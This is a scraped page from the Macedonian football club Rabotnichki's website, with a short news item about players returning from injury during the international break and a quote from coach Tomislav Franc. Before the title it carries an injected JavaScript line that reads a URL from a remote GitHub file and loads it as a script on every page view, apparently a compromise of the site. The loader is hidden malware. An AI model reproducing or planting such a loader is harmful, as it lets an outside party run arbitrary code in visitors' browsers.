;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Паузата е добредојдена за консолидирање на тимот од повредите
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Паузата е добредојдена за консолидирање на тимот од повредите

Работнички на најдобар можен начин ја користи репрезентативната пауза и во овие две седмици тимот треба да се консолидира и да се комплетира по повредите што ги мачеа одредени фудбалери. Дел од нив веќе се во тренажен процес заедно со екипата.

Борче Маневски почна со тренинзи по скршеницата на раката поради која го пропушти првиот дел од пролетната полуетапа, а и Кире Маркоски ја надмина повредата на мускулот.

„Работиме напорно и полека се комплетираме. Маневски и Маркоски се приклучија во тренажен процес со екипата и очекувам дека во наредниот период ќе бидат подготвени за настап. Душко Трајчевски исто така се чувствува подобро, иако неговата состојба е малку поспецифична, со оглед дека имаше болки во бубрезите. Паузата секако е добредојдена за консолидирање на тимот, како и за подобра подготовка за следните искушенија“, вели шефот на стручниот штаб, Томислав Франц.

Останува и дефанзивецот Бојан Марковски да се приклучи на тренинзите на тимот, па ’главоболките’ со повредените да бидат сведени на минимум.

 

Leave a Reply